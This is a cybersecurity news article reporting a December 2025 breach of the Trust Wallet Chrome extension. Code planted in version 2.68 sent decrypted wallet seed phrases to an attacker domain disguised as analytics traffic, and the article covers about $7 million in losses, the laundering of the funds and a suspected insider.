Trust Wallet Chrome Extension Breach Results in $7 Million Cryptocurrency Theft via Malicious Code
December 26, 2025 – By Ravie Lakshmanan
Trust Wallet, the popular multi-chain, non-custodial cryptocurrency wallet, has suffered a major security breach impacting its Google Chrome extension, resulting in a loss of approximately $7 million in digital assets. The company has urged users to immediately update the affected extension version 2.68 to the latest patch, version 2.69, to mitigate further risks.
Details of the Security Incident
The compromised Chrome extension, which has close to one million users listed on the Chrome Web Store, was found to contain malicious code introduced in version 2.68. Trust Wallet confirmed the security incident on its official social media channel, X (formerly Twitter), highlighting that the breach has impacted roughly $7 million and pledging full refunds to all affected users.
"Supporting affected users is our top priority, and we are actively finalizing the process to refund the impacted users," the company stated.
Importantly, Trust Wallet specified that mobile app users and other browser extension versions remain unaffected. It also warned users to avoid interacting with any communications not originating from official Trust Wallet channels, underscoring risks of phishing attempts amid the fallout.
How the Attack Was Executed
Blockchain security firm SlowMist provided in-depth technical analysis of the breach. The malicious code installed in version 2.68 was designed to iterate through all wallets stored in the extension. For each wallet, it triggered a mnemonic phrase request. When users unlocked their wallets by entering passwords or passphrases, the extension decrypted the encrypted mnemonic phrases and then exfiltrated this sensitive data to an attacker-controlled server at api.metrics-trustwallet[.]com.
Further investigation revealed that the attacker exploited the legitimate open-source analytics library posthog-js to stealthily harvest user information. By redirecting analytics data to their own server, the attacker masked the data exfiltration under the guise of routine analytics traffic.
Notably, the malicious domain metrics-trustwallet[.]com was registered on December 8, 2025, with the first data transmissions detected starting December 21, 2025. ### Impact and Laundering of Stolen Funds
The breach resulted in the theft of approximately $3 million in Bitcoin, over $3 million in Ethereum, and around $431 in Solana, among other assets. Analysis by blockchain investigator ZachXBT has identified hundreds of victims affected by this incident.
Large sums of the stolen cryptocurrency—more than $4 million—have been laundered through centralized exchanges and cross-chain bridges, complicating asset tracing and recovery efforts. According to PeckShield, a blockchain security company, about $2.8 million remains in attacker-controlled wallets, while around $3.3 million was moved to ChangeNOW, $340,000 to FixedFloat, and $447,000 to KuCoin exchange accounts.
Origin and Possible Insider Involvement
SlowMist’s detailed forensics suggest that this attack stemmed from a direct modification of the Trust Wallet extension’s internal codebase, specifically the analytics logic, rather than through a compromised third-party dependency such as a malicious npm package.
“The attacker directly tampered with the application’s own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel,” SlowMist explained.
There is speculation that the breach may have involved a nation-state actor or an insider threat. Trust Wallet indicated the attackers might have obtained deployment permissions or compromised developer devices before December 8, 2025. Supporting this theory, Changpeng Zhao, co-founder of Binance—which owns Trust Wallet—hinted that the exploit was “most likely” carried out by an insider, although no concrete evidence has been released to substantiate this claim.
Response and Next Steps
Trust Wallet has called on all users with the affected Chrome extension to promptly update to version 2.69. The company is finalizing refunds for victims and continues to investigate the full scope of the breach.
Users are advised to exercise caution by verifying official communications from Trust Wallet and avoiding unsolicited messages, especially those requesting sensitive credentials.
Conclusion
This incident serves as a stark reminder of the evolving risks in the cryptocurrency ecosystem, including supply chain and insider threats. As browser extensions remain popular targets due to their privileged access to sensitive information, vigilance in code security, and rapid incident response are crucial.
Stay updated with the latest developments by following cybersecurity and cryptocurrency news platforms.
Follow us for more exclusive cybersecurity updates:
- Google News
The Hacker News, 2025